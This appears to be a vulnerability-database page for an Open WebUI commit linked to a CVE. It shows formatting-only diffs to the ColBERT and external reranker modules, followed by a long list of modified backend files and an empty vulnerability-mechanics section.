backend/open_webui/retrieval/models/colbert.py+8 −20 modified@@ -13,19 +13,17 @@ class ColBERT(BaseReranker): def __init__(self, name, **kwargs) -> None: - log.info("ColBERT: Loading model", name) - self.device = "cuda" if torch.cuda.is_available() else "cpu" + log.info('ColBERT: Loading model', name) + self.device = 'cuda' if torch.cuda.is_available() else 'cpu' - DOCKER = kwargs.get("env") == "docker" + DOCKER = kwargs.get('env') == 'docker' if DOCKER: # This is a workaround for the issue with the docker container # where the torch extension is not loaded properly # and the following error is thrown: # /root/.cache/torch_extensions/py311_cpu/segmented_maxsim_cpp/segmented_maxsim_cpp.so: cannot open shared object file: No such file or directory - lock_file = ( - "/root/.cache/torch_extensions/py311_cpu/segmented_maxsim_cpp/lock" - ) + lock_file = '/root/.cache/torch_extensions/py311_cpu/segmented_maxsim_cpp/lock' if os.path.exists(lock_file): os.remove(lock_file) @@ -36,23 +34,16 @@ def __init__(self, name, **kwargs) -> None: pass def calculate_similarity_scores(self, query_embeddings, document_embeddings): - query_embeddings = query_embeddings.to(self.device) document_embeddings = document_embeddings.to(self.device) # Validate dimensions to ensure compatibility if query_embeddings.dim() != 3: - raise ValueError( - f"Expected query embeddings to have 3 dimensions, but got {query_embeddings.dim()}." - ) + raise ValueError(f'Expected query embeddings to have 3 dimensions, but got {query_embeddings.dim()}.') if document_embeddings.dim() != 3: - raise ValueError( - f"Expected document embeddings to have 3 dimensions, but got {document_embeddings.dim()}." - ) + raise ValueError(f'Expected document embeddings to have 3 dimensions, but got {document_embeddings.dim()}.') if query_embeddings.size(0) not in [1, document_embeddings.size(0)]: - raise ValueError( - "There should be either one query or queries equal to the number of documents." - ) + raise ValueError('There should be either one query or queries equal to the number of documents.') # Transpose the query embeddings to align for matrix multiplication transposed_query_embeddings = query_embeddings.permute(0, 2, 1) @@ -69,7 +60,6 @@ def calculate_similarity_scores(self, query_embeddings, document_embeddings): return normalized_scores.detach().cpu().numpy().astype(np.float32) def predict(self, sentences): - query = sentences[0][0] docs = [i[1] for i in sentences] @@ -80,8 +70,6 @@ def predict(self, sentences): embedded_query = embedded_queries[0] # Calculate retrieval scores for the query against all documents - scores = self.calculate_similarity_scores( - embedded_query.unsqueeze(0), embedded_docs - ) + scores = self.calculate_similarity_scores(embedded_query.unsqueeze(0), embedded_docs) return scores
backend/open_webui/retrieval/models/external.py+17 −19 modified@@ -15,42 +15,40 @@ class ExternalReranker(BaseReranker): def __init__( self, api_key: str, - url: str = "http://localhost:8080/v1/rerank", - model: str = "reranker", + url: str = 'http://localhost:8080/v1/rerank', + model: str = 'reranker', timeout: Optional[int] = None, ): self.api_key = api_key self.url = url self.model = model self.timeout = timeout - def predict( - self, sentences: List[Tuple[str, str]], user=None - ) -> Optional[List[float]]: + def predict(self, sentences: List[Tuple[str, str]], user=None) -> Optional[List[float]]: query = sentences[0][0] docs = [i[1] for i in sentences] payload = { - "model": self.model, - "query": query, - "documents": docs, - "top_n": len(docs), + 'model': self.model, + 'query': query, + 'documents': docs, + 'top_n': len(docs), } try: - log.info(f"ExternalReranker:predict:model {self.model}") - log.info(f"ExternalReranker:predict:query {query}") + log.info(f'ExternalReranker:predict:model {self.model}') + log.info(f'ExternalReranker:predict:query {query}') headers = { - "Content-Type": "application/json", - "Authorization": f"Bearer {self.api_key}", + 'Content-Type': 'application/json', + 'Authorization': f'Bearer {self.api_key}', } if ENABLE_FORWARD_USER_INFO_HEADERS and user: headers = include_user_info_headers(headers, user) r = requests.post( - f"{self.url}", + f'{self.url}', headers=headers, json=payload, timeout=self.timeout, @@ -60,13 +58,13 @@ def predict( r.raise_for_status() data = r.json() - if "results" in data: - sorted_results = sorted(data["results"], key=lambda x: x["index"]) - return [result["relevance_score"] for result in sorted_results] + if 'results' in data: + sorted_results = sorted(data['results'], key=lambda x: x['index']) + return [result['relevance_score'] for result in sorted_results] else: - log.error("No results found in external reranking response") + log.error('No results found in external reranking response') return None except Exception as e: - log.exception(f"Error in external reranking: {e}") + log.exception(f'Error in external reranking: {e}') return None
backend/open_webui/retrieval/utils.py+0 −0 modifiedbackend/open_webui/retrieval/vector/dbs/chroma.py+29 −41 modifiedbackend/open_webui/retrieval/vector/dbs/elasticsearch.py+79 −98 modifiedbackend/open_webui/retrieval/vector/dbs/mariadb_vector.py+61 −71 modifiedbackend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py+55 −73 modifiedbackend/open_webui/retrieval/vector/dbs/milvus.py+90 −127 modifiedbackend/open_webui/retrieval/vector/dbs/opengauss.py+61 −100 modifiedbackend/open_webui/retrieval/vector/dbs/opensearch.py+73 −91 modifiedbackend/open_webui/retrieval/vector/dbs/oracle23ai.py+93 −139 modifiedbackend/open_webui/retrieval/vector/dbs/pgvector.py+106 −177 modifiedbackend/open_webui/retrieval/vector/dbs/pinecone.py+92 −160 modifiedbackend/open_webui/retrieval/vector/dbs/qdrant_multitenancy.py+29 −51 modifiedbackend/open_webui/retrieval/vector/dbs/qdrant.py+39 −45 modifiedbackend/open_webui/retrieval/vector/dbs/s3vector.py+139 −210 modifiedbackend/open_webui/retrieval/vector/dbs/weaviate.py+47 −77 modifiedbackend/open_webui/retrieval/vector/factory.py+1 −2 modifiedbackend/open_webui/retrieval/vector/main.py+1 −3 modifiedbackend/open_webui/retrieval/vector/type.py+12 −12 modifiedbackend/open_webui/retrieval/vector/utils.py+2 −4 modifiedbackend/open_webui/retrieval/web/azure.py+26 −29 modifiedbackend/open_webui/retrieval/web/bing.py+16 −20 modifiedbackend/open_webui/retrieval/web/bocha.py+19 −26 modifiedbackend/open_webui/retrieval/web/brave.py+11 −13 modifiedbackend/open_webui/retrieval/web/duckduckgo.py+6 −8 modifiedbackend/open_webui/retrieval/web/exa.py+15 −17 modifiedbackend/open_webui/retrieval/web/external.py+10 −10 modifiedbackend/open_webui/retrieval/web/firecrawl.py+3 −5 modifiedbackend/open_webui/retrieval/web/google_pse.py+14 −16 modifiedbackend/open_webui/retrieval/web/jina_search.py+11 −13 modifiedbackend/open_webui/retrieval/web/kagi.py+7 −11 modifiedbackend/open_webui/retrieval/web/main.py+1 −1 modifiedbackend/open_webui/retrieval/web/mojeek.py+6 −11 modifiedbackend/open_webui/retrieval/web/ollama.py+10 −10 modifiedbackend/open_webui/retrieval/web/perplexity.py+29 −32 modifiedbackend/open_webui/retrieval/web/perplexity_search.py+11 −14 modifiedbackend/open_webui/retrieval/web/searchapi.py+10 −12 modifiedbackend/open_webui/retrieval/web/searxng.py+24 −26 modifiedbackend/open_webui/retrieval/web/serpapi.py+10 −12 modifiedbackend/open_webui/retrieval/web/serper.py+9 −13 modifiedbackend/open_webui/retrieval/web/serply.py+21 −23 modifiedbackend/open_webui/retrieval/web/serpstack.py+7 −11 modifiedbackend/open_webui/retrieval/web/sougou.py+9 −16 modifiedbackend/open_webui/retrieval/web/tavily.py+8 −8 modifiedbackend/open_webui/retrieval/web/utils.py+99 −118 modifiedbackend/open_webui/retrieval/web/yacy.py+18 −18 modifiedbackend/open_webui/retrieval/web/yandex.py+47 −61 modifiedbackend/open_webui/retrieval/web/ydc.py+13 −13 modifiedbackend/open_webui/routers/analytics.py+57 −75 modifiedbackend/open_webui/routers/audio.py+371 −455 modifiedbackend/open_webui/routers/auths.py+280 −386 modifiedbackend/open_webui/routers/channels.py+416 −734 modifiedbackend/open_webui/routers/chats.py+218 −364 modifiedbackend/open_webui/routers/configs.py+146 −195 modifiedbackend/open_webui/routers/evaluations.py+68 −123 modifiedbackend/open_webui/routers/files.py+125 −217 modifiedbackend/open_webui/routers/folders.py+44 −76 modifiedbackend/open_webui/routers/functions.py+73 −124 modifiedbackend/open_webui/routers/groups.py+29 −40 modifiedbackend/open_webui/routers/images.py+325 −431 modifiedbackend/open_webui/routers/knowledge.py+137 −174 modifiedbackend/open_webui/routers/memories.py+41 −62 modifiedbackend/open_webui/routers/models.py+84 −108 modifiedbackend/open_webui/routers/notes.py+65 −87 modifiedbackend/open_webui/routers/ollama.py+381 −460 modifiedbackend/open_webui/routers/openai.py+336 −420 modifiedbackend/open_webui/routers/pipelines.py+103 −136 modifiedbackend/open_webui/routers/prompts.py+90 −110 modifiedbackend/open_webui/routers/retrieval.py+635 −846 modifiedbackend/open_webui/routers/scim.py+179 −203 modifiedbackend/open_webui/routers/skills.py+55 −61 modifiedbackend/open_webui/routers/tasks.py+218 −283 modifiedbackend/open_webui/routers/terminals.py+67 −78 modifiedbackend/open_webui/routers/tools.py+131 −181 modifiedbackend/open_webui/routers/users.py+79 −113 modifiedbackend/open_webui/routers/utils.py+22 −28 modifiedbackend/open_webui/socket/main.py+252 −289 modifiedbackend/open_webui/socket/utils.py+23 −30 modifiedbackend/open_webui/storage/provider.py+59 −84 modifiedbackend/open_webui/tasks.py+27 −29 modifiedbackend/open_webui/test/apps/webui/routers/test_auths.py+93 −97 modifiedbackend/open_webui/test/apps/webui/routers/test_models.py+24 −28 modifiedbackend/open_webui/test/apps/webui/routers/test_users.py+66 −68 modifiedbackend/open_webui/test/apps/webui/storage/test_provider.py+67 −96 modifiedbackend/open_webui/test/util/test_redis.py+216 −228 modifiedbackend/open_webui/tools/builtin.py+430 −467 modifiedbackend/open_webui/utils/access_control/files.py+8 −16 modifiedbackend/open_webui/utils/access_control/__init__.py+31 −57 modifiedbackend/open_webui/utils/actions.py+34 −36 modifiedbackend/open_webui/utils/anthropic.py+204 −212 modifiedbackend/open_webui/utils/audit.py+38 −58 modifiedbackend/open_webui/utils/auth.py+84 −94 modifiedbackend/open_webui/utils/channels.py+5 −5 modifiedbackend/open_webui/utils/chat.py+81 −91 modifiedbackend/open_webui/utils/code_interpreter.py+65 −76 modifiedbackend/open_webui/utils/embeddings.py+12 −12 modifiedbackend/open_webui/utils/files.py+26 −28 modifiedbackend/open_webui/utils/filter.py+27 −42 modifiedbackend/open_webui/utils/groups.py+1 −3 modifiedbackend/open_webui/utils/headers.py+1 −1 modifiedbackend/open_webui/utils/images/comfyui.py+96 −138 modifiedbackend/open_webui/utils/logger.py+47 −53 modifiedbackend/open_webui/utils/mcp/client.py+20 −28 modifiedbackend/open_webui/utils/middleware.py+1448 −1845 modifiedbackend/open_webui/utils/misc.py+185 −226 modifiedbackend/open_webui/utils/models.py+141 −170 modifiedbackend/open_webui/utils/oauth.py+291 −475 modifiedbackend/open_webui/utils/payload.py+117 −131 modifiedbackend/open_webui/utils/pdf_generator.py+22 −26 modifiedbackend/open_webui/utils/plugin.py+82 −114 modifiedbackend/open_webui/utils/rate_limit.py+3 −7 modifiedbackend/open_webui/utils/redis.py+37 −48 modifiedbackend/open_webui/utils/response.py+78 −96 modifiedbackend/open_webui/utils/sanitize.py+4 −6 modifiedbackend/open_webui/utils/security_headers.py+36 −36 modifiedbackend/open_webui/utils/task.py+89 −134 modifiedbackend/open_webui/utils/telemetry/constants.py+16 −16 modifiedbackend/open_webui/utils/telemetry/instrumentors.py+17 −31 modifiedbackend/open_webui/utils/telemetry/logs.py+3 −3 modifiedbackend/open_webui/utils/telemetry/metrics.py+33 −37 modifiedbackend/open_webui/utils/telemetry/setup.py+3 −3 modifiedbackend/open_webui/utils/tools.py+303 −388 modifiedbackend/open_webui/utils/validate.py+7 −9 modifiedbackend/open_webui/utils/webhook.py+21 −27 modifiedcontribution_stats.py+12 −14 modifiedhatch_build.py+8 −10 modifiedpackage.json+1 −1 modified
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
4News mentions
0No linked articles in our index yet.